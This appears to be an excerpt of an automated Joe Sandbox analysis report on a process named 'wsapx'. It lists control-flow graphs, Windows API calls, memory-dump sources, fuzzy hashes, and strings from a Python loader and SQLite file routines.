                                                                                                                                                                                                                                                control_flow_graph 830 7ff7c71cbacc-7ff7c71cbaf2 831 7ff7c71cbaf4-7ff7c71cbb08 call 7ff7c71c4f58 call 7ff7c71c4f78 830->831 832 7ff7c71cbb0d-7ff7c71cbb11 830->832 846 7ff7c71cbefe 831->846 833 7ff7c71cbee7-7ff7c71cbef3 call 7ff7c71c4f58 call 7ff7c71c4f78 832->833 834 7ff7c71cbb17-7ff7c71cbb1e 832->834 853 7ff7c71cbef9 call 7ff7c71ca950 833->853 834->833 836 7ff7c71cbb24-7ff7c71cbb52 834->836 836->833 840 7ff7c71cbb58-7ff7c71cbb5f 836->840 843 7ff7c71cbb61-7ff7c71cbb73 call 7ff7c71c4f58 call 7ff7c71c4f78 840->843 844 7ff7c71cbb78-7ff7c71cbb7b 840->844 843->853 849 7ff7c71cbee3-7ff7c71cbee5 844->849 850 7ff7c71cbb81-7ff7c71cbb87 844->850 851 7ff7c71cbf01-7ff7c71cbf18 846->851 849->851 850->849 854 7ff7c71cbb8d-7ff7c71cbb90 850->854 853->846 854->843 857 7ff7c71cbb92-7ff7c71cbbb7 854->857 859 7ff7c71cbbb9-7ff7c71cbbbb 857->859 860 7ff7c71cbbea-7ff7c71cbbf1 857->860 861 7ff7c71cbbe2-7ff7c71cbbe8 859->861 862 7ff7c71cbbbd-7ff7c71cbbc4 859->862 863 7ff7c71cbbf3-7ff7c71cbc1b call 7ff7c71cd66c call 7ff7c71ca9b8 * 2 860->863 864 7ff7c71cbbc6-7ff7c71cbbdd call 7ff7c71c4f58 call 7ff7c71c4f78 call 7ff7c71ca950 860->864 866 7ff7c71cbc68-7ff7c71cbc7f 861->866 862->861 862->864 890 7ff7c71cbc1d-7ff7c71cbc33 call 7ff7c71c4f78 call 7ff7c71c4f58 863->890 891 7ff7c71cbc38-7ff7c71cbc63 call 7ff7c71cc2f4 863->891 894 7ff7c71cbd70 864->894 869 7ff7c71cbc81-7ff7c71cbc89 866->869 870 7ff7c71cbcfa-7ff7c71cbd04 call 7ff7c71d398c 866->870 869->870 874 7ff7c71cbc8b-7ff7c71cbc8d 869->874 881 7ff7c71cbd8e 870->881 882 7ff7c71cbd0a-7ff7c71cbd1f 870->882 874->870 878 7ff7c71cbc8f-7ff7c71cbca5 874->878 878->870 883 7ff7c71cbca7-7ff7c71cbcb3 878->883 886 7ff7c71cbd93-7ff7c71cbdb3 ReadFile 881->886 882->881 888 7ff7c71cbd21-7ff7c71cbd33 GetConsoleMode 882->888 883->870 889 7ff7c71cbcb5-7ff7c71cbcb7 883->889 892 7ff7c71cbead-7ff7c71cbeb6 GetLastError 886->892 893 7ff7c71cbdb9-7ff7c71cbdc1 886->893 888->881 895 7ff7c71cbd35-7ff7c71cbd3d 888->895 889->870 896 7ff7c71cbcb9-7ff7c71cbcd1 889->896 890->894 891->866 902 7ff7c71cbed3-7ff7c71cbed6 892->902 903 7ff7c71cbeb8-7ff7c71cbece call 7ff7c71c4f78 call 7ff7c71c4f58 892->903 893->892 899 7ff7c71cbdc7 893->899 904 7ff7c71cbd73-7ff7c71cbd7d call 7ff7c71ca9b8 894->904 895->886 901 7ff7c71cbd3f-7ff7c71cbd61 ReadConsoleW 895->901 896->870 897 7ff7c71cbcd3-7ff7c71cbcdf 896->897 897->870 905 7ff7c71cbce1-7ff7c71cbce3 897->905 909 7ff7c71cbdce-7ff7c71cbde3 899->909 911 7ff7c71cbd63 GetLastError 901->911 912 7ff7c71cbd82-7ff7c71cbd8c 901->912 906 7ff7c71cbedc-7ff7c71cbede 902->906 907 7ff7c71cbd69-7ff7c71cbd6b call 7ff7c71c4eec 902->907 903->894 904->851 905->870 916 7ff7c71cbce5-7ff7c71cbcf5 905->916 906->904 907->894 909->904 918 7ff7c71cbde5-7ff7c71cbdf0 909->918 911->907 912->909 916->870 922 7ff7c71cbdf2-7ff7c71cbe0b call 7ff7c71cb6e4 918->922 923 7ff7c71cbe17-7ff7c71cbe1f 918->923 930 7ff7c71cbe10-7ff7c71cbe12 922->930 927 7ff7c71cbe21-7ff7c71cbe33 923->927 928 7ff7c71cbe9b-7ff7c71cbea8 call 7ff7c71cb524 923->928 931 7ff7c71cbe35 927->931 932 7ff7c71cbe8e-7ff7c71cbe96 927->932 928->930 930->904 934 7ff7c71cbe3a-7ff7c71cbe41 931->934 932->904 935 7ff7c71cbe43-7ff7c71cbe47 934->935 936 7ff7c71cbe7d-7ff7c71cbe88 934->936 937 7ff7c71cbe63 935->937 938 7ff7c71cbe49-7ff7c71cbe50 935->938 936->932 940 7ff7c71cbe69-7ff7c71cbe79 937->940 938->937 939 7ff7c71cbe52-7ff7c71cbe56 938->939 939->937 941 7ff7c71cbe58-7ff7c71cbe61 939->941 940->934 942 7ff7c71cbe7b 940->942 941->940 942->932
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                • Instruction ID: 41f3a82bdc70f6a546d4a16df185e655519058753c3f07397cff2973656d6180
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C1C522A0C68643E771AF95A4402BDBB64EBC1FA0FD54131EA4E43795CE7CEA578720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                • Instruction ID: d131e0bf37c044a7974ff9731e90d6bf2c0c4d3d92f0c100cc1a6b660e626357
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08418171A18A8692EA11EF21F4552E9A321FBD4BA0FC04132DE5D43695EF3CE607C760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 980 7ffd9474ef40-7ffd9474ef8c 981 7ffd9474ef91-7ffd9474f004 980->981 982 7ffd9474f02b-7ffd9474f03b call 7ffd9474bfd0 981->982 983 7ffd9474f006-7ffd9474f015 call 7ffd9474e980 981->983 990 7ffd9474f041-7ffd9474f06a 982->990 991 7ffd9474f54a-7ffd9474f54d 982->991 988 7ffd9474f5af-7ffd9474f5d2 call 7ffd9486cad0 983->988 989 7ffd9474f01b-7ffd9474f026 983->989 989->982 992 7ffd9474f070-7ffd9474f085 990->992 994 7ffd9474f54f-7ffd9474f556 991->994 995 7ffd9474f5aa 991->995 1002 7ffd9474f0c2-7ffd9474f0cc 992->1002 1003 7ffd9474f087-7ffd9474f093 992->1003 997 7ffd9474f5a1 994->997 998 7ffd9474f558-7ffd9474f562 994->998 995->988 997->995 1000 7ffd9474f564 998->1000 1001 7ffd9474f56a-7ffd9474f597 998->1001 1000->1001 1001->995 1018 7ffd9474f599-7ffd9474f59f 1001->1018 1005 7ffd9474f0ce-7ffd9474f0d0 1002->1005 1006 7ffd9474f0d6-7ffd9474f0f1 1002->1006 1003->1006 1011 7ffd9474f095-7ffd9474f09b 1003->1011 1005->1006 1008 7ffd9474f318-7ffd9474f31f 1005->1008 1009 7ffd9474f0f3-7ffd9474f0f7 1006->1009 1010 7ffd9474f0f9-7ffd9474f102 1006->1010 1013 7ffd9474f321-7ffd9474f32b 1008->1013 1014 7ffd9474f36a 1008->1014 1015 7ffd9474f105-7ffd9474f119 call 7ffd94801c90 1009->1015 1010->1015 1016 7ffd9474f0a3-7ffd9474f0a6 1011->1016 1017 7ffd9474f09d-7ffd9474f0a1 1011->1017 1019 7ffd9474f333-7ffd9474f360 1013->1019 1020 7ffd9474f32d 1013->1020 1024 7ffd9474f373 1014->1024 1026 7ffd9474f11b-7ffd9474f134 call 7ffd947ba9f0 1015->1026 1027 7ffd9474f136 1015->1027 1022 7ffd9474f0af-7ffd9474f0c0 1016->1022 1023 7ffd9474f0a8-7ffd9474f0ad 1016->1023 1017->1016 1017->1022 1018->995 1028 7ffd9474f37a-7ffd9474f37d 1019->1028 1045 7ffd9474f362-7ffd9474f368 1019->1045 1020->1019 1022->992 1023->1006 1023->1022 1024->1028 1032 7ffd9474f138-7ffd9474f15a 1026->1032 1027->1032 1033 7ffd9474f37f-7ffd9474f386 1028->1033 1034 7ffd9474f3db-7ffd9474f3e0 1028->1034 1037 7ffd9474f160-7ffd9474f187 CreateFileW 1032->1037 1038 7ffd9474f3d2 1033->1038 1039 7ffd9474f388-7ffd9474f38b 1033->1039 1034->988 1041 7ffd9474f18d-7ffd9474f18f 1037->1041 1042 7ffd9474f230 1037->1042 1038->1034 1043 7ffd9474f393-7ffd9474f3c0 1039->1043 1044 7ffd9474f38d 1039->1044 1046 7ffd9474f191-7ffd9474f1a3 1041->1046 1047 7ffd9474f1df-7ffd9474f1ec 1041->1047 1048 7ffd9474f234-7ffd9474f237 1042->1048 1043->1034 1073 7ffd9474f3c2-7ffd9474f3cd 1043->1073 1044->1043 1045->1024 1050 7ffd9474f1a5 1046->1050 1051 7ffd9474f1a7-7ffd9474f1cd call 7ffd9474f7a0 1046->1051 1061 7ffd9474f1ee-7ffd9474f1f4 1047->1061 1062 7ffd9474f22c-7ffd9474f22e 1047->1062 1053 7ffd9474f239-7ffd9474f262 call 7ffd94748e10 1048->1053 1054 7ffd9474f267-7ffd9474f26b 1048->1054 1050->1051 1071 7ffd9474f1d1-7ffd9474f1d3 1051->1071 1072 7ffd9474f1cf 1051->1072 1053->1054 1056 7ffd9474f271-7ffd9474f281 call 7ffd94745850 1054->1056 1057 7ffd9474f41f-7ffd9474f42d 1054->1057 1076 7ffd9474f283-7ffd9474f28a 1056->1076 1077 7ffd9474f2de-7ffd9474f2e3 1056->1077 1063 7ffd9474f43d-7ffd9474f456 call 7ffd94745850 1057->1063 1064 7ffd9474f42f-7ffd9474f43b 1057->1064 1068 7ffd9474f206-7ffd9474f209 1061->1068 1069 7ffd9474f1f6-7ffd9474f204 1061->1069 1062->1048 1086 7ffd9474f4b3-7ffd9474f4b6 1063->1086 1087 7ffd9474f458-7ffd9474f45f 1063->1087 1064->1063 1078 7ffd9474f212-7ffd9474f227 1068->1078 1079 7ffd9474f20b-7ffd9474f210 1068->1079 1069->1068 1069->1078 1074 7ffd9474f1db 1071->1074 1075 7ffd9474f1d5-7ffd9474f1d9 1071->1075 1072->1071 1073->988 1074->1047 1075->1042 1075->1074 1084 7ffd9474f28c-7ffd9474f296 1076->1084 1085 7ffd9474f2d5 1076->1085 1082 7ffd9474f2e9-7ffd9474f2ee 1077->1082 1083 7ffd9474f3e5-7ffd9474f41a call 7ffd9474c790 call 7ffd94800d40 1077->1083 1078->1037 1079->1062 1079->1078 1082->1083 1090 7ffd9474f2f4-7ffd9474f313 1082->1090 1083->988 1092 7ffd9474f29e-7ffd9474f2cb 1084->1092 1093 7ffd9474f298 1084->1093 1085->1077 1095 7ffd9474f4bd 1086->1095 1096 7ffd9474f4b8-7ffd9474f4bb 1086->1096 1088 7ffd9474f461-7ffd9474f46b 1087->1088 1089 7ffd9474f4aa 1087->1089 1098 7ffd9474f473-7ffd9474f4a0 1088->1098 1099 7ffd9474f46d 1088->1099 1089->1086 1090->981 1092->1077 1113 7ffd9474f2cd-7ffd9474f2d3 1092->1113 1093->1092 1097 7ffd9474f4c4-7ffd9474f4dc 1095->1097 1096->1097 1101 7ffd9474f4e2-7ffd9474f4ea 1097->1101 1102 7ffd9474f4de 1097->1102 1098->1086 1116 7ffd9474f4a2-7ffd9474f4a8 1098->1116 1099->1098 1105 7ffd9474f522-7ffd9474f548 1101->1105 1106 7ffd9474f4ec-7ffd9474f500 call 7ffd94801c90 1101->1106 1102->1101 1105->988 1114 7ffd9474f502-7ffd9474f51c call 7ffd947ba9f0 1106->1114 1115 7ffd9474f51e 1106->1115 1113->1077 1114->1105 1114->1115 1115->1105 1116->1086
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619$CreateFile
                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                • API String ID: 400822396-3829269058
                                                                                                                                                                                                                                                • Opcode ID: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                                                                                                • Instruction ID: 790a0a64dae7022f9530f0086799ea6b66cf16918798a3825782c9654e32542f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C029F31B09A46C6FA788FE1A8E027977A5FF86B54F048635DE4E426A2DF3CE445C740
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 0-3764764234
                                                                                                                                                                                                                                                • Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                                                • Instruction ID: 61b38557c12ebad3576b2d46a8871dac98944910efc112711b8e5621a6aa2ade
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D714261B0864AC1FAB49BD5E5E437977A1FB86B84F54C035CA4D4B6A6EF3CE442C380
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619FileRead
                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                • API String ID: 3382942480-1843600136
                                                                                                                                                                                                                                                • Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                                                • Instruction ID: 8921c7a0011181456955f8ed91acf752b52913a02477dbaf42a1f7a861cb5f59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85411732B08A4A8AE230DF95E4E04B87796FB46780F55C136EA4D43796DF3CE441C780
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction ID: 3fa3712730203a21713272f923b36b88b47f3eb768463d7f2c27089bf2514277
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E541C822D1878183E310AF61A551379B760FBD4BB4F908334EA5C03AD1DF7CA5E28760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction ID: b51fe4a4f4d6e6491221dbb5985eeacbca90a5ed64967321097aa08276f2f87e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF314BA5E0824743FA64BF64B4623B99A919FC5FA4FC44434DD4E4B2D3DE2CE50786B0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction ID: 38bd95e9f4edfaad8ff504e530bdb76222f489bed8d80ab98bd67998b975b0b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D851D421B092414FE624AEA6A90067EE691BBC4FB4F945734DE6D477C5CE3CD4028620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction ID: 45cd257ebe968dedf8a9017d63e518e87f626e9994ae5da0e6065c9b46ba4dc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7611C461A18A4182DA20AF6AB844169A361BB85FF4F944335EE7D4B7D9CE7CD4528700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
